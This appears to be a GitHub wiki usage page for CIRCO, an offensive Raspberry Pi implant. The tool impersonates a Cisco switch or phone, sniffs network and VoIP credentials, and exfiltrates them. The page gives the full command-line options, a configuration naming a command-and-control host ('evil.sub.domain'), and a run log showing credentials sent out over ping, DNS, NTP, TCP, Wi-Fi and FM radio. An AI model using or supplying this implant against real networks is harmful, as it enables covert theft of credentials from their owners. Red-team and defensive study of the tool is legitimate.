-
Notifications
You must be signed in to change notification settings - Fork 11
CIRCO Usage
Emilio edited this page Aug 7, 2020
·
3 revisions
(venv) root@circov2020:/home/pi-enc/v2020# ./circo.py
____ ___ ____ ____ ___
/ ___|_ _| _ \ / ___/ _ \
| | | || |_) | | | | | |
| |___ | || _ <| |__| |_| |
\____|___|_| \_\\____\___/
Author: Emilio / @ekio_jp
Version: 2.020
usage: circo.py [-h] [-v] (-i <eth0> | -b) [-A] [-p] [-t] [-d] [-x] [-n] [-f]
[-w <wlan1>] [--tcp 80] [--spoof] [--voip] [-l <logfile>]
optional arguments:
-h, --help show this help message and exit
-v, --verbose Enable debugging
-i <eth0> Single Mode: <eth0>
-b, --bridge Bridge Mode: Use eth0 & eth1
-A, --ALL All exfiltration
-p, --ping PING exfiltration
-t, --trace Traceroute exfiltration
-d, --dns DNS exfiltration
-x, --prx Proxy exfiltration
-n, --ntp NTP exfiltration
-f, --fm FM DRS exfiltration
-w <wlan1> Wireles exfiltration
--tcp 80 TCP exfiltration
--spoof Spoofing MAC/IP (Proxy Excluded)
--voip Collect RTP and SIP credentials
-l <logfile> Log File (default <timestamp>.log
(venv) root@circov2020:/home/pi-enc/v2020#
Using -v will print out the program flow and also when credentials been sent
out
The -i eth0 (single mode) or -b (bridge mode) are mandatory, we need a LAN NIC to be a Phone/Switch (single mode) or 2 LAN NIC (eth0 to switch) and (eth1 to phone).
Extraction modes are optional, you can combine multiple or -A
Note -a wlan1 need a wireless NIC adaptor capable of packet injection, I
found using the onbord Raspberry PI wireless is unstable so I opt for a USB
wireless dongle (RT3080/RT3070) work out-of-the-box with Raspbian
--spoof will pickup a MAC/IP from eth1 and use those for exfiltration
--voip will capture RTP and SIP pcap's in Captures directory
-l log credentials to a file
PHRASE='Waaaaa! awesome :)'
SALT='salgruesa'
SEED1=1000
SEED2=5000
SEED3=8000
MAGIC=666
WIFICHAN=10
SWMAC='00:07:B4:00:FA:DE'
INT='FastEthernet0/3'
PHONEMAC='10:8C:CF:75:BB:AA'
SERIAL='FCW1831C1AA'
SNPSU='LIT18300QBB'
SNMPC='public'
CCHOST='200.200.200.300'
CCNAME='evil.sub.domain'
DIRNAME='/home/pi-enc/v2020/'
SSIDROOT='nec-c17c02'
SSIDALARM='pacman'
WIFIMAC='98:f1:99:c1:7c:02'
SNMPTPL='snmpwalk.mib'
TYPE='switch'
FM='87.6'
venv) root@circov2020:/home/pi-enc/v2020# ./circo.py -v -b -p -t -n -d -x -f --tcp 80 -w wlan1 -l creds.txt
____ ___ ____ ____ ___
/ ___|_ _| _ \ / ___/ _ \
| | | || |_) | | | | | |
| |___ | || _ <| |__| |_| |
\____|___|_| \_\\____\___/
Author: Emilio / @ekio_jp
Version: 2.020
DEBUG:CDP/LLDP peer discovery
DEBUG:Change MAC to fake switch: 00:07:B4:00:FA:DE
DEBUG:DHCP request started
DEBUG:Configure br0 interface
DEBUG:Collect gateway ARP
DEBUG:Starting Proxy Discovery
DEBUG:Found PAC via DHCP: http://10.10.10.1:88/proxy.pac
DEBUG:Starting Net-Creds Sniffer
DEBUG:SNMP fake template created
DEBUG:Starting CDP as switch
DEBUG:Starting LLDP as switch
DEBUG:Starting IOS Telnet
DEBUG:Starting IOS SSH
DEBUG:Starting IOS SNMP
DEBUG:Starting NMAP OS Fooler
DEBUG:Start WIFI wlan1 monitor mode in channel 10
DEBUG:Starting Exfiltration WIFI
DEBUG:Starting Exfiltration PING
DEBUG:Starting Exfiltracion Traceroute
DEBUG:Starting Exfiltracion TCP 80
DEBUG:Starting Exfiltracion NTP
DEBUG:Starting Exfiltracion DNS
DEBUG:Starting Exfiltracion Proxy DNS
DEBUG:Starting Exfiltracion FM
DEBUG:Sending credentials via PING
DEBUG:Sending credentials via Wifi
DEBUG:Sending credentials via NTP
DEBUG:Sending credentials via DNS
DEBUG:Sending credentials via TRACE
DEBUG:Sending credentials via Proxy DNS
DEBUG:Sending credentials via FM 87.6
DEBUG:Sending credentials via TCP 80
-
Installation
-
Usage
-
Hardware
-
Demo Videos